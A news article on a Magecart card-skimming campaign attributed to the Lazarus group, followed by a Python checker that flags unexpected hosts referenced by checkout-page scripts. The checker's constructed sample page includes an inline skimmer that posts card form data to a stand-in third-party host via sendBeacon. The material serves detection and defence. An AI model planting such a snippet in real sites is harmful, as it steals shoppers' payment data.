Multiple Retailers Affected by New North Korea Cyber Attack

Websites of several retailers in the United States and Europe have been compromised by the Magecart credit card skimmer following a series of cyberattacks allegedly launched by the North Korean state-sponsored Advanced Persistent Threat (APT) group Lazarus. Until now, North Korean hacking activity has been limited to South Korean banks and cryptocurrency markets, and the country's covert cyber operations have netted its hackers $2 billion, according to a UN report published last year. As reported by Computer Weekly, Sansec researcher Willem de Groot first discovered the new campaign, which has been running for more than 12 months. De Groot believes the campaign is financially motivated, because raising hard currency is difficult for North Korea and its government. Payment card details stolen by Magecart skimmers can be sold for between €5 and €30 on dark web forums, meaning the operation was likely quite lucrative for the Lazarus group.

Global skimming campaign

According to a Sansec blog post, the Lazarus group used the websites of an Italian modeling agency and a vintage music store in Tehran to run its global skimming campaign. To monetize the skimming, the group built a global exfiltration network that uses compromised legitimate websites as cover for its criminal activity; the same network funnels the stolen card data so it can be sold on dark web marketplaces. Sansec's investigation connected the dots back to the Lazarus group after identifying multiple independent links between the recent skimming activity and previously documented North Korean hacking operations. The company believes the group used phishing attacks to obtain staff passwords for the online shops. Once inside, the attackers injected the malicious Magecart script into the stores' checkout pages, where the skimmer collected customer payment details. The intrusions were first observed in June last year, and Sansec has tracked the campaign ever since using unique identifying features and distinctive patterns in the skimmer code.

Via Computer Weekly
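The defensive takeaway from the mechanism described above is that a checkout page suddenly talking to an unrelated third-party site (here, a modeling agency or a record shop) is the tell. The following Python check is an added example, not Sansec's tooling or anything from the article: it parses a checkout page, collects every host referenced by external `<script src>` tags or by URLs embedded in inline scripts, and reports those missing from an allowlist. All hostnames and the sample page are constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed allowlist: hosts this shop's checkout page may load scripts from or talk to.
ALLOWED_HOSTS = {"shop.example", "cdn.shop.example", "checkout.psp.example"}
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?::\d+)?(?:/[^\s'\"<>)]*)?")

class ScriptCollector(HTMLParser):
    """Collect external script sources and inline script bodies from a page."""
    def __init__(self):
        super().__init__()
        self.srcs, self.inline, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)
            else:
                self._in_script = True
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.inline.append(data)

def find_unexpected_hosts(html, allowed=ALLOWED_HOSTS):
    """Hosts referenced by <script src> or by URLs inside inline scripts that are
    not on the allowlist; anything returned deserves a look on a checkout page."""
    p = ScriptCollector()
    p.feed(html)
    hosts = {urlparse(s).hostname for s in p.srcs}
    for body in p.inline:
        hosts.update(urlparse(u).hostname for u in URL_RE.findall(body))
    return sorted(h for h in hosts if h and h not in allowed)

# Constructed checkout page: the legitimate PSP script plus an injected inline
# skimmer that posts the card form to an unrelated third-party site on submit.
SAMPLE_CHECKOUT = """
<script src="https://checkout.psp.example/v1/pay.js"></script>
<form id="checkout"><input name="cc_number"><input name="cvv"></form>
<script>
document.getElementById('checkout').addEventListener('submit', function () {
  navigator.sendBeacon('https://vintage-records.example/img/track.php', new FormData(this));
});
</script>
"""
```

Running `find_unexpected_hosts(SAMPLE_CHECKOUT)` flags only `vintage-records.example`; the same allowlist can be enforced at runtime with a Content Security Policy whose `script-src` and `connect-src` directives list just those hosts.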